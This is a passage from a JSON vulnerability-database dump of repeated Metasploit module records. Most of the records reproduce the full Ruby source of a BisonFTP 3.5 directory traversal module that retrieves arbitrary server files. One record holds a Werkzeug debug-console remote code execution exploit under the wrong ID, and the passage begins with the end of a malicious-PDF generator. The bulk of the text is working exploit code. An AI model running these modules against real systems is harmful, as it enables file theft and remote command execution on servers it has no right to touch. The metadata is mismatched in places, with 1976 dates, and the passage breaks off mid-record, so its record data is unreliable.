<</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>\")\n add_object(4, \"[/PDF/Text/ImageC]\")\n add_object(5, \"<</Type/Page/Parent 3 0 R/Contents 6 0 R>>\")\n stream_1 = \"stream\" << eol\n stream_1 << \"0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q\" << eol\n stream_1 << \"endstream\" << eol\n add_object(6, \"<</Length 91>>#{stream_1}\")\n stream = \"<<\" << eol\n stream << \"/Width 230\" << eol\n stream << \"/BitsPerComponent 8\" << eol\n stream << \"/Name /X\" << eol\n stream << \"/Height 50\" << eol\n stream << \"/Intent /RelativeColorimetric\" << eol\n stream << \"/Subtype /Image\" << eol\n stream << \"/Filter /DCTDecode\" << eol\n stream << \"/Length #{jpeg.length}\" << eol\n stream << \"/ColorSpace /DeviceCMYK\" << eol\n stream << \"/Type /XObject\" << eol\n stream << \">>\"\n stream << \"stream\" << eol\n stream << jpeg << eol\n stream << \"endstream\" << eol\n add_object(7, stream)\n finish_pdf\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-11T01:38:46", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 76}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-11T03:39:44", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-11T03:39:44"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-11T03:39:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-11T03:39:44", "differentElements": ["sourceData"], "edition": 77}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-14T11:48:11", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-08-14T11:48:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-14T11:48:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-14T11:48:11", "differentElements": ["sourceData"], "edition": 78}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-14T13:47:39", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-14T13:47:39"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-14T13:47:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-14T13:47:39", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 79}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "07ca257e2a6bec53a5eb3383fd1e2a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "Werkzeug Debug Shell Command Execution", "description": "This module will exploit the Werkzeug debug console to put down a Python shell. This debugger \"must never be used on production machines\" but sometimes slips passed testing. Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian\n", "published": "2015-06-28T01:38:25", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger"], "cvelist": [], "lastseen": "2019-08-22T20:28:52", "history": [], "viewCount": 5, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-08-22T20:28:52"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:7046413755550762908"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112634", "OPENVAS:1361412562310112633", "OPENVAS:1361412562310876699", "OPENVAS:1361412562310876695", "OPENVAS:1361412562310844144", "OPENVAS:1361412562310876700", "OPENVAS:1361412562310844142", "OPENVAS:1361412562310815547", "OPENVAS:1361412562310844141", "OPENVAS:1361412562310815549"]}], "modified": "2019-08-22T20:28:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/werkzeug_debug_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Werkzeug Debug Shell Command Execution',\n 'Description' => %q{\n This module will exploit the Werkzeug debug console to put down a\n Python shell. This debugger \"must never be used on production\n machines\" but sometimes slips passed testing.\n\n Tested against:\n 0.9.6 on Debian\n 0.9.6 on Centos\n 0.10 on Debian\n },\n 'Author' => 'h00die <mike[at]shorebreaksecurity.com>',\n 'References' =>\n [\n ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => ['python'],\n 'Targets' => [[ 'werkzeug 0.10 and older', {}]],\n 'Arch' => ARCH_PYTHON,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 28 2015'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'URI to the console', '/console'])\n ], self.class\n )\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67\n if res && res.body =~ /Werkzeug powered traceback interpreter/\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n # first we need to get the SECRET code\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n if res && res.body =~ /SECRET = \"([a-zA-Z0-9]{20})\";/\n secret = $1\n vprint_status(\"Secret Code: #{secret}\")\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'vars_get' => {\n '__debugger__' => 'yes',\n 'cmd' => payload.encoded,\n 'frm' => '0',\n 's' => secret\n }\n )\n else\n print_error('Secret code not detected.')\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-22T20:28:52", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 80}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-22T22:24:04", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-22T22:24:04"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-22T22:24:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-22T22:24:04", "differentElements": ["sourceData"], "edition": 81}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-24T16:25:18", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-08-24T16:25:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-24T16:25:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-24T16:25:18", "differentElements": ["sourceData"], "edition": 82}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-24T18:30:59", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-24T18:30:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-24T18:30:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-24T18:30:59", "differentElements": ["modified", "published"], "edition": 83}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "4a45d8a912178abfeaf285407e747950", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-30T08:46:32", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-30T08:46:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-30T08:46:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n 